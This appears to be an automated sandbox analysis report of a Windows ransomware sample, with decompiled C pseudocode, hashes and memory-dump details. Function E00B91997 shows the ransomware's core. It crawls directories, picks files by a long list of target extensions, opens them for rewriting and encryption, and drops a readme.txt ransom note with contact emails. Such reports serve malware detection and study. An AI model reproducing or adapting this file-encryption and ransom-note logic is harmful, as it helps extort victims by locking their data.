                                                              0x00c6b1d4
                                                              0x00c6b1d5
                                                              0x00c6b1d6
                                                              0x00c6b1df
                                                              0x00c6b1df
                                                              0x00c6b1f5

                                                              APIs
                                                                • Part of subcall function 00C6D8C9: __getptd_noexit.LIBCMT ref: 00C6D8C9
                                                                • Part of subcall function 00C6FB6E: __decode_pointer.LIBCMT ref: 00C6FB79
                                                              • __lock_file.LIBCMT ref: 00C6B1F7
                                                                • Part of subcall function 00C6A4BD: __lock.LIBCMT ref: 00C6A4E2
                                                              • __fclose_nolock.LIBCMT ref: 00C6B201
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 717694121-0
                                                              • Opcode ID: 3ea893f10d4dc1e154e1fea62144d84b55a92b9a63abebd60ba4517ed499d1ca
                                                              • Instruction ID: 9ea9861d2e914ffd6918cd5356da4e950805a06f9eb41f673bf2d96fd409915c
                                                              • Opcode Fuzzy Hash: 3ea893f10d4dc1e154e1fea62144d84b55a92b9a63abebd60ba4517ed499d1ca
                                                              • Instruction Fuzzy Hash: 7DF0C870C00604DAC730BB6A9C8565E7BE05F45330F20C249F479D61C1CB384A43AB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA3430, Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 58%
                                                              			E00BA3430(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				intOrPtr* _t5;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t15;

				_t10 = __ebx;
				_t5 =  *0xcc1284; // 0xba33f0
				if(_t5 == 0 || _t5 == E00BA33F0) {
					_t14 = _a4;
					if(_a4 > 0) {
						 *0xcc1280 = 0; // executed
						_t6 = E00C6A294(_t10, _t12, _t14, _t14); // executed
						goto L6;
					} else {
						return 0;
					}
				} else {
					_t14 = _a4;
					_t6 =  *_t5(_a4, _a8, _a12);
					L6:
					_t15 = _t6;
					if(_t15 != 0) {
						E00C6BB40(_t14, _t15, 0, _t14);
					}
					return _t15;
				}
			}









                                                              0x00ba3430
                                                              0x00ba3430
                                                              0x00ba3439
                                                              0x00ba3458
                                                              0x00ba345e
                                                              0x00ba3466
                                                              0x00ba3470
                                                              0x00000000
                                                              0x00ba3461
                                                              0x00ba3464
                                                              0x00ba3464
                                                              0x00ba3442
                                                              0x00ba344a
                                                              0x00ba3451
                                                              0x00ba3478
                                                              0x00ba3478
                                                              0x00ba347c
                                                              0x00ba3482
                                                              0x00ba3487
                                                              0x00ba348e
                                                              0x00ba348e

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _malloc_memset
                                                              • String ID:
                                                              • API String ID: 4137368368-0
                                                              • Opcode ID: 643b49249a2aa553970bd9cb13775a007ee615f8f6cc6a237d4404282ba67e61
                                                              • Instruction ID: dff75b0445e79c0ce0385725576617e4ad91e2f4ac3c61f690cc105fffd2efbe
                                                              • Opcode Fuzzy Hash: 643b49249a2aa553970bd9cb13775a007ee615f8f6cc6a237d4404282ba67e61
                                                              • Instruction Fuzzy Hash: 0FF0B4736082112BD6219A19BC41F5FA3E4EBC7F60F094159F804D7300DB30DD4686B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B91997, Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 85%
                                                              			E00B91997(signed int __edx) {
				int _t91;
				intOrPtr* _t92;
				signed int _t93;
				intOrPtr* _t94;
				signed int _t102;
				intOrPtr* _t103;
				signed int _t105;
				signed int _t106;
				signed int _t111;
				signed int _t112;
				intOrPtr* _t113;
				signed int _t114;
				char* _t117;
				signed int _t118;
				char _t121;
				intOrPtr* _t122;
				signed int _t125;
				intOrPtr* _t126;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t132;
				signed int _t134;
				intOrPtr* _t137;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t142;
				void* _t143;
				signed int _t146;
				intOrPtr* _t151;
				void* _t152;
				char _t155;
				intOrPtr* _t156;
				intOrPtr _t160;
				signed int _t167;
				signed int _t168;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t181;
				char _t182;
				intOrPtr _t183;
				signed int _t184;
				signed int _t186;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t194;
				char* _t198;
				void* _t201;
				void* _t202;
				signed int _t203;
				signed int _t204;
				char** _t206;
				signed int _t207;
				void* _t208;
				signed int _t209;
				intOrPtr _t212;
				intOrPtr* _t213;
				intOrPtr _t214;
				signed int _t215;
				intOrPtr _t217;
				void* _t221;
				void* _t222;
				void* _t223;
				void* _t228;

				_t187 = __edx;
				_t217 =  *((intOrPtr*)(_t215 - 0x18));
				 *((intOrPtr*)(_t215 - 4)) = 0xfffffffe;
				_t213 =  *((intOrPtr*)(_t215 - 0x160c));
				while(1) {
					L75:
					_t201 =  *(_t215 - 0x1608);
					_t91 = FindNextFileA(_t201, _t215 - 0x15f0); // executed
					if(_t91 == 0) {
						break;
					}
					__eflags =  *(_t215 - 0x15f0) & 0x00000010;
					if(( *(_t215 - 0x15f0) & 0x00000010) != 0) {
						__eflags =  *(_t215 - 0x15c4) - 0x2e;
						if( *(_t215 - 0x15c4) != 0x2e) {
							_t92 = _t213;
							_t188 = _t92 + 1;
							do {
								_t167 =  *_t92;
								_t92 = _t92 + 1;
								__eflags = _t167;
							} while (_t167 != 0);
							_t93 = _t92 - _t188;
							__eflags = _t93;
							_t187 = _t93;
							_t94 = _t215 - 0x15c4;
							_t49 = _t94 + 1; // 0x2f
							_t202 = _t49;
							do {
								_t162 =  *_t94;
								_t94 = _t94 + 1;
								__eflags = _t162;
							} while (_t162 != 0);
							__eflags = _t94 - _t202 + _t187 - 0x514;
							if(_t94 - _t202 + _t187 < 0x514) {
								E00C6BB40(_t202, _t215 - 0xf98, 0, 0x514);
								E00C6BB40(_t202, _t215 - 0x568, 0, 0x514);
								_push(_t215 - 0x15c4);
								E00C69C35(_t202, _t213, _t215 - 0xf98, "%s%s", _t213);
								_t217 = _t217 + 0x28;
								_t102 = 0;
								do {
									_t178 =  *((intOrPtr*)(_t215 + _t102 - 0xf98));
									 *((char*)(_t215 + _t102 - 0x568)) = _t178;
									_t102 = _t102 + 1;
									__eflags = _t178;
								} while (_t178 != 0);
								_t203 = 0;
								__eflags = 0;
								_t103 = _t215 - 0x568;
								_t187 = _t103 + 1;
								do {
									_t179 =  *_t103;
									_t103 = _t103 + 1;
									__eflags = _t179;
								} while (_t179 != 0);
								__eflags = _t103 != _t187;
								if(_t103 != _t187) {
									do {
										_t121 = E00C6AFFA( *((char*)(_t215 + _t203 - 0x568)));
										_t217 = _t217 + 4;
										 *((char*)(_t215 + _t203 - 0x568)) = _t121;
										_t203 = _t203 + 1;
										__eflags = _t203;
										_t122 = _t215 - 0x568;
										_t187 = _t122 + 1;
										do {
											_t186 =  *_t122;
											_t122 = _t122 + 1;
											__eflags = _t186;
										} while (_t186 != 0);
										__eflags = _t203 - _t122 - _t187;
									} while (_t203 < _t122 - _t187);
								}
								_t204 = 0;
								__eflags =  *0xec9fb0;
								if( *0xec9fb0 != 0) {
									_t117 = 0xec9fb0;
									while(1) {
										_t187 = _t215 - 0x568;
										_t118 = E00C6A360(_t215 - 0x568, _t117);
										_t217 = _t217 + 8;
										__eflags = _t118;
										if(_t118 != 0) {
											break;
										}
										_t204 = _t204 + 1;
										_t117 = 0xec9fb0 + _t204 * 0xff;
										__eflags =  *_t117;
										if( *_t117 != 0) {
											continue;
										} else {
										}
										goto L63;
									}
									 *((char*)(_t215 - 0x15f1)) = 0;
								}
								L63:
								_t206 = _t215 - 0xf97;
								__eflags = _t206;
								do {
									_t105 = _t206[0];
									_t206 =  &(_t206[0]);
									__eflags = _t105;
								} while (_t105 != 0);
								_t162 = "\\"; // 0x5c
								 *_t206 = _t162;
								__eflags =  *((intOrPtr*)(_t215 - 0x15f1)) - _t105;
								if( *((intOrPtr*)(_t215 - 0x15f1)) != _t105) {
									_t106 = E00C6A360(_t215 - 0x568, "DESKTOP");
									_t228 = _t217 + 8;
									__eflags = _t106;
									if(_t106 != 0) {
										_t111 = _t215 - 0x567;
										__eflags = _t111;
										do {
											_t181 =  *(_t111 + 1);
											_t111 = _t111 + 1;
											__eflags = _t181;
										} while (_t181 != 0);
										_t182 = "/readme.txt"; // 0x6165722f
										 *_t111 = _t182;
										_t198 = M00CBF7C8; // 0x2e656d64
										 *((intOrPtr*)(_t111 + 4)) = _t198;
										_t183 =  *0xcbf7cc; // 0x747874
										 *((intOrPtr*)(_t111 + 8)) = _t183;
										_t112 = L00C6A96D(_t215 - 0x568, "w+"); // executed
										_t228 = _t228 + 8;
										_t207 = _t112;
										__eflags = _t207;
										if(_t207 != 0) {
											_t113 = 0xdc9fb0;
											do {
												_t184 =  *_t113;
												_t113 = _t113 + 1;
												__eflags = _t184;
											} while (_t184 != 0);
											_t114 = _t113 - 0xdc9fb1;
											__eflags = _t114;
											_push(_t207);
											_push(_t114);
											_push(1);
											_push("Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a");
											E00C6ADA3(_t159, 0xdc9fb1, _t207, _t213, __eflags);
											_push(_t207); // executed
											E00C6B1A7(_t159, 0xdc9fb1, _t207, _t213, __eflags); // executed
											_t228 = _t228 + 0x14;
										}
									}
									_t162 = _t215 - 0xf98;
									_t187 =  *(_t215 - 0x1600);
									E00B91640( *(_t215 - 0x1600), _t215 - 0xf98,  *(_t215 + 0x10),  *((intOrPtr*)(_t215 + 0x14)),  *((intOrPtr*)(_t215 - 0x15f8)),  *((intOrPtr*)(_t215 - 0x15fc))); // executed
									_t217 = _t228 + 0x18;
								}
								 *((char*)(_t215 - 0x15f1)) = 1;
							}
						}
					} else {
						_t125 = E00C6AE30(_t162, _t215 - 0x15c4, 0x2e);
						_t217 = _t217 + 8;
						_t159 = _t125;
						__eflags = _t159;
						if(_t159 != 0) {
							_t126 = _t213;
							_t189 = _t126 + 1;
							do {
								_t168 =  *_t126;
								_t126 = _t126 + 1;
								__eflags = _t168;
							} while (_t168 != 0);
							_t127 = _t126 - _t189;
							__eflags = _t127;
							_t187 = _t127;
							_t128 = _t215 - 0x15c4;
							_t208 = _t128 + 1;
							do {
								_t162 =  *_t128;
								_t128 = _t128 + 1;
								__eflags = _t162;
							} while (_t162 != 0);
							__eflags = _t128 - _t208 + _t187 - 0x514;
							if(_t128 - _t208 + _t187 < 0x514) {
								E00C6BB40(_t208, _t215 - 0x50, 0, 0x32);
								_t221 = _t217 + 0xc;
								_t132 = _t159;
								_t12 = _t132 + 1; // 0x1
								_t190 = _t12;
								do {
									_t170 =  *_t132;
									_t132 = _t132 + 1;
									__eflags = _t170;
								} while (_t170 != 0);
								__eflags = _t132 - _t190 - 0x32;
								if(_t132 - _t190 <= 0x32) {
									_t134 = _t159;
									_t13 = _t134 + 1; // 0x1
									_t191 = _t13;
									do {
										_t171 =  *_t134;
										_t134 = _t134 + 1;
										__eflags = _t171;
									} while (_t171 != 0);
									_t135 = _t134 - _t191;
									__eflags = _t134 - _t191;
								} else {
									_t135 = 0x32;
								}
								E00C6A6C0(_t215 - 0x50, _t159, _t135);
								_t222 = _t221 + 0xc;
								_t209 = 0;
								__eflags = 0;
								_t137 = _t215 - 0x50;
								_t187 = _t137 + 1;
								do {
									_t172 =  *_t137;
									_t137 = _t137 + 1;
									__eflags = _t172;
								} while (_t172 != 0);
								__eflags = _t137 != _t187;
								if(_t137 != _t187) {
									do {
										_t155 = E00C6AFFA( *((char*)(_t215 + _t209 - 0x50)));
										_t222 = _t222 + 4;
										 *((char*)(_t215 + _t209 - 0x50)) = _t155;
										_t209 = _t209 + 1;
										__eflags = _t209;
										_t156 = _t215 - 0x50;
										_t187 = _t156 + 1;
										do {
											_t176 =  *_t156;
											_t156 = _t156 + 1;
											__eflags = _t176;
										} while (_t176 != 0);
										__eflags = _t209 - _t156 - _t187;
									} while (_t209 < _t156 - _t187);
								}
								_t162 = _t215 - 0x50;
								_t139 = E00C6A360(".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA", _t215 - 0x50);
								_t217 = _t222 + 8;
								__eflags = _t139;
								if(_t139 != 0) {
									_t162 = "readme.txt";
									_t140 = _t215 - 0x15c4;
									while(1) {
										_t187 =  *_t140;
										__eflags = _t187 -  *_t162;
										if(_t187 !=  *_t162) {
											break;
										}
										__eflags = _t187;
										if(_t187 == 0) {
											L28:
											_t140 = 0;
										} else {
											_t187 =  *((intOrPtr*)(_t140 + 1));
											__eflags = _t187 - _t162[1];
											if(_t187 != _t162[1]) {
												break;
											} else {
												_t140 = _t140 + 2;
												_t162 =  &(_t162[2]);
												__eflags = _t187;
												if(_t187 != 0) {
													continue;
												} else {
													goto L28;
												}
											}
										}
										L30:
										__eflags = _t140;
										if(_t140 != 0) {
											E00C6BB40(_t209, _t215 - 0xa80, 0, 0x514);
											_t223 = _t217 + 0xc;
											_t142 = _t213;
											_t194 = _t142 + 1;
											do {
												_t173 =  *_t142;
												_t142 = _t142 + 1;
												__eflags = _t173;
											} while (_t173 != 0);
											_t143 = _t142 - _t194;
											__eflags =  *((char*)(_t143 + _t213 - 1)) - 0x5c;
											if( *((char*)(_t143 + _t213 - 1)) == 0x5c) {
												L38:
												_t187 = _t215 - 0x15c4;
												_push(_t215 - 0x15c4);
												_push(_t213);
												_push("%s%s");
												_push(_t215 - 0xa80);
											} else {
												_t151 = _t213;
												_t187 = _t151 + 1;
												do {
													_t174 =  *_t151;
													_t151 = _t151 + 1;
													__eflags = _t174;
												} while (_t174 != 0);
												_t152 = _t151 - _t187;
												__eflags =  *((char*)(_t152 + _t213 - 1)) - 0x2f;
												if( *((char*)(_t152 + _t213 - 1)) == 0x2f) {
													goto L38;
												} else {
													_push(_t215 - 0x15c4);
													_push(_t213);
													_push("%s\\%s");
													_push(_t215 - 0xa80);
												}
											}
											E00C69C35(_t209, _t213);
											 *((intOrPtr*)(_t215 - 4)) = 0;
											_t162 = _t215 - 0xa80;
											_t146 = L00C6A96D(_t215 - 0xa80, "rb+"); // executed
											_t217 = _t223 + 0x18;
											__eflags = _t146;
											if(__eflags != 0) {
												_push(_t146); // executed
												E00C6B1A7(_t159, _t187, _t209, _t213, __eflags); // executed
												_t210 =  *((intOrPtr*)(_t215 - 0x15f8));
												E00C6BB40( *((intOrPtr*)(_t215 - 0x15f8)),  *((intOrPtr*)(_t215 - 0x15f8)), 0, 0x100000);
												E00C6BB40( *((intOrPtr*)(_t215 - 0x15f8)),  *((intOrPtr*)(_t215 - 0x15fc)), 0, 0x100000);
												_t187 =  *(_t215 + 0x10);
												_t159 =  *(_t215 - 0x1600);
												E00B915D0( *(_t215 - 0x1600), _t215 - 0xa80,  *(_t215 + 0x10), _t210,  *((intOrPtr*)(_t215 - 0x15fc)));
												_t217 = _t217 + 0x28;
											}
											 *((intOrPtr*)(_t215 - 4)) = 0xfffffffe;
										}
										goto L75;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L30;
								}
							}
						}
					}
				}
				if(_t201 != 0xffffffff) {
					_t91 = FindClose(_t201); // executed
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0x10));
				_pop(_t212);
				_pop(_t214);
				_pop(_t160);
				return E00C69C26(_t91, _t160,  *(_t215 - 0x1c) ^ _t215, _t187, _t212, _t214);
			}










































































                                                              0x00b91997
                                                              0x00b91997
                                                              0x00b9199a
                                                              0x00b919a1
                                                              0x00b91bc3
                                                              0x00b91bc3
                                                              0x00b91bca
                                                              0x00b91bd1
                                                              0x00b91bd9
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91766
                                                              0x00b9176d
                                                              0x00b919ac
                                                              0x00b919b3
                                                              0x00b919b9
                                                              0x00b919bb
                                                              0x00b919c0
                                                              0x00b919c0
                                                              0x00b919c2
                                                              0x00b919c3
                                                              0x00b919c3
                                                              0x00b919c7
                                                              0x00b919c7
                                                              0x00b919c9
                                                              0x00b919cb
                                                              0x00b919d1
                                                              0x00b919d1
                                                              0x00b919d4
                                                              0x00b919d4
                                                              0x00b919d6
                                                              0x00b919d7
                                                              0x00b919d7
                                                              0x00b919df
                                                              0x00b919e4
                                                              0x00b919f8
                                                              0x00b91a0e
                                                              0x00b91a1c
                                                              0x00b91a2a
                                                              0x00b91a2f
                                                              0x00b91a32
                                                              0x00b91a40
                                                              0x00b91a40
                                                              0x00b91a47
                                                              0x00b91a4e
                                                              0x00b91a4f
                                                              0x00b91a4f
                                                              0x00b91a53
                                                              0x00b91a53
                                                              0x00b91a55
                                                              0x00b91a5b
                                                              0x00b91a60
                                                              0x00b91a60
                                                              0x00b91a62
                                                              0x00b91a63
                                                              0x00b91a63
                                                              0x00b91a67
                                                              0x00b91a69
                                                              0x00b91a70
                                                              0x00b91a79
                                                              0x00b91a7e
                                                              0x00b91a81
                                                              0x00b91a88
                                                              0x00b91a88
                                                              0x00b91a89
                                                              0x00b91a8f
                                                              0x00b91a92
                                                              0x00b91a92
                                                              0x00b91a94
                                                              0x00b91a95
                                                              0x00b91a95
                                                              0x00b91a9b
                                                              0x00b91a9b
                                                              0x00b91a70
                                                              0x00b91a9f
                                                              0x00b91aa1
                                                              0x00b91aa8
                                                              0x00b91aaa
                                                              0x00b91ab0
                                                              0x00b91ab1
                                                              0x00b91ab8
                                                              0x00b91abd
                                                              0x00b91ac0
                                                              0x00b91ac2
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91ac4
                                                              0x00b91acd
                                                              0x00b91ad3
                                                              0x00b91ad6
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91ad8
                                                              0x00000000
                                                              0x00b91ad6
                                                              0x00b91ada
                                                              0x00b91ada
                                                              0x00b91ae1
                                                              0x00b91ae7
                                                              0x00b91ae7
                                                              0x00b91ae8
                                                              0x00b91ae8
                                                              0x00b91aeb
                                                              0x00b91aec
                                                              0x00b91aec
                                                              0x00b91af0
                                                              0x00b91af7
                                                              0x00b91afa
                                                              0x00b91b00
                                                              0x00b91b12
                                                              0x00b91b17
                                                              0x00b91b1a
                                                              0x00b91b1c
                                                              0x00b91b24
                                                              0x00b91b24
                                                              0x00b91b25
                                                              0x00b91b25
                                                              0x00b91b28
                                                              0x00b91b29
                                                              0x00b91b29
                                                              0x00b91b2d
                                                              0x00b91b33
                                                              0x00b91b35
                                                              0x00b91b3b
                                                              0x00b91b3e
                                                              0x00b91b44
                                                              0x00b91b53
                                                              0x00b91b58
                                                              0x00b91b5b
                                                              0x00b91b5d
                                                              0x00b91b5f
                                                              0x00b91b61
                                                              0x00b91b70
                                                              0x00b91b70
                                                              0x00b91b72
                                                              0x00b91b73
                                                              0x00b91b73
                                                              0x00b91b77
                                                              0x00b91b77
                                                              0x00b91b79
                                                              0x00b91b7a
                                                              0x00b91b7b
                                                              0x00b91b7d
                                                              0x00b91b82
                                                              0x00b91b87
                                                              0x00b91b88
                                                              0x00b91b8d
                                                              0x00b91b8d
                                                              0x00b91b5f
                                                              0x00b91ba6
                                                              0x00b91bad
                                                              0x00b91bb4
                                                              0x00b91bb9
                                                              0x00b91bb9
                                                              0x00b91bbc
                                                              0x00b91bbc
                                                              0x00b919e4
                                                              0x00b91773
                                                              0x00b9177c
                                                              0x00b91781
                                                              0x00b91784
                                                              0x00b91786
                                                              0x00b91788
                                                              0x00b9178e
                                                              0x00b91790
                                                              0x00b91793
                                                              0x00b91793
                                                              0x00b91795
                                                              0x00b91796
                                                              0x00b91796
                                                              0x00b9179a
                                                              0x00b9179a
                                                              0x00b9179c
                                                              0x00b9179e
                                                              0x00b917a4
                                                              0x00b917a7
                                                              0x00b917a7
                                                              0x00b917a9
                                                              0x00b917aa
                                                              0x00b917aa
                                                              0x00b917b2
                                                              0x00b917b7
                                                              0x00b917c5
                                                              0x00b917ca
                                                              0x00b917cd
                                                              0x00b917cf
                                                              0x00b917cf
                                                              0x00b917d2
                                                              0x00b917d2
                                                              0x00b917d4
                                                              0x00b917d5
                                                              0x00b917d5
                                                              0x00b917db
                                                              0x00b917de
                                                              0x00b917e7
                                                              0x00b917e9
                                                              0x00b917e9
                                                              0x00b917f0
                                                              0x00b917f0
                                                              0x00b917f2
                                                              0x00b917f3
                                                              0x00b917f3
                                                              0x00b917f7
                                                              0x00b917f7
                                                              0x00b917e0
                                                              0x00b917e0
                                                              0x00b917e0
                                                              0x00b917ff
                                                              0x00b91804
                                                              0x00b91807
                                                              0x00b91807
                                                              0x00b91809
                                                              0x00b9180c
                                                              0x00b91810
                                                              0x00b91810
                                                              0x00b91812
                                                              0x00b91813
                                                              0x00b91813
                                                              0x00b91817
                                                              0x00b91819
                                                              0x00b91820
                                                              0x00b91826
                                                              0x00b9182b
                                                              0x00b9182e
                                                              0x00b91832
                                                              0x00b91832
                                                              0x00b91833
                                                              0x00b91836
                                                              0x00b91840
                                                              0x00b91840
                                                              0x00b91842
                                                              0x00b91843
                                                              0x00b91843
                                                              0x00b91849
                                                              0x00b91849
                                                              0x00b91820
                                                              0x00b9184d
                                                              0x00b91856
                                                              0x00b9185b
                                                              0x00b9185e
                                                              0x00b91860
                                                              0x00b91866
                                                              0x00b9186b
                                                              0x00b91871
                                                              0x00b91871
                                                              0x00b91873
                                                              0x00b91875
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91877
                                                              0x00b91879
                                                              0x00b9188d
                                                              0x00b9188d
                                                              0x00b9187b
                                                              0x00b9187b
                                                              0x00b9187e
                                                              0x00b91881
                                                              0x00000000
                                                              0x00b91883
                                                              0x00b91883
                                                              0x00b91886
                                                              0x00b91889
                                                              0x00b9188b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9188b
                                                              0x00b91881
                                                              0x00b91896
                                                              0x00b91896
                                                              0x00b91898
                                                              0x00b918ac
                                                              0x00b918b1
                                                              0x00b918b4
                                                              0x00b918b6
                                                              0x00b918c0
                                                              0x00b918c0
                                                              0x00b918c2
                                                              0x00b918c3
                                                              0x00b918c3
                                                              0x00b918c7
                                                              0x00b918c9
                                                              0x00b918ce
                                                              0x00b918fb
                                                              0x00b918fb
                                                              0x00b91901
                                                              0x00b91902
                                                              0x00b91903
                                                              0x00b9190e
                                                              0x00b918d0
                                                              0x00b918d0
                                                              0x00b918d2
                                                              0x00b918d5
                                                              0x00b918d5
                                                              0x00b918d7
                                                              0x00b918d8
                                                              0x00b918d8
                                                              0x00b918dc
                                                              0x00b918de
                                                              0x00b918e3
                                                              0x00000000
                                                              0x00b918e5
                                                              0x00b918eb
                                                              0x00b918ec
                                                              0x00b918ed
                                                              0x00b918f8
                                                              0x00b918f8
                                                              0x00b918e3
                                                              0x00b9190f
                                                              0x00b91917
                                                              0x00b91923
                                                              0x00b9192a
                                                              0x00b9192f
                                                              0x00b91932
                                                              0x00b91934
                                                              0x00b91936
                                                              0x00b91937
                                                              0x00b91946
                                                              0x00b9194d
                                                              0x00b91963
                                                              0x00b9196d
                                                              0x00b91977
                                                              0x00b9197d
                                                              0x00b91982
                                                              0x00b91982
                                                              0x00b91985
                                                              0x00b91985
                                                              0x00000000
                                                              0x00b91898
                                                              0x00b91891
                                                              0x00b91893
                                                              0x00000000
                                                              0x00b91893
                                                              0x00b91860
                                                              0x00b917b7
                                                              0x00b91788
                                                              0x00b9176d
                                                              0x00b91be2
                                                              0x00b91be5
                                                              0x00b91be5
                                                              0x00b91bee
                                                              0x00b91bf6
                                                              0x00b91bf7
                                                              0x00b91bf8
                                                              0x00b91c06

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Find$CloseFileNext_memset_strncpy_strrchr
                                                              • String ID:
                                                              • API String ID: 1886237078-0
                                                              • Opcode ID: bc6ff43120c3114f476ebcf44292536cfe875c1acf975436ae17b5d8c7a25db2
                                                              • Instruction ID: 17b672b1633139ca16e6107bdd1885ebf94e0756723e44d6c51f334e3caef317
                                                              • Opcode Fuzzy Hash: bc6ff43120c3114f476ebcf44292536cfe875c1acf975436ae17b5d8c7a25db2
                                                              • Instruction Fuzzy Hash: C1F08272A0410A8BCF24CB58DD856BEB3B9EB88331F1406E9D82AA3290E73529419B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C6A637, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 75%
                                                              			E00C6A637(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t13;
				void* _t22;

				_push(0xc);
				_push(0xcbf9c0);
				E00C70838(__ebx, __edi, __esi);
				E00C6A4BD( *((intOrPtr*)(_t22 + 8)));
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t13 = E00C6A59B(__ebx, __edx,  *((intOrPtr*)(_t22 + 8)),  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)),  *((intOrPtr*)(_t22 + 0x14))); // executed
				 *((intOrPtr*)(_t22 - 0x1c)) = _t13;
				 *(_t22 - 4) = 0xfffffffe;
				E00C6A67C();
				return E00C7087D( *((intOrPtr*)(_t22 - 0x1c)));
			}





                                                              0x00c6a637
                                                              0x00c6a639
                                                              0x00c6a63e
                                                              0x00c6a646
                                                              0x00c6a64c
                                                              0x00c6a65c
                                                              0x00c6a664
                                                              0x00c6a667
                                                              0x00c6a66e
                                                              0x00c6a67b

                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00C6A646
                                                                • Part of subcall function 00C6A4BD: __lock.LIBCMT ref: 00C6A4E2
                                                              • __fseeki64_nolock.LIBCMT ref: 00C6A65C
                                                                • Part of subcall function 00C6A59B: __ftelli64_nolock.LIBCMT ref: 00C6A5C9
                                                                • Part of subcall function 00C6A59B: __flush.LIBCMT ref: 00C6A5D8
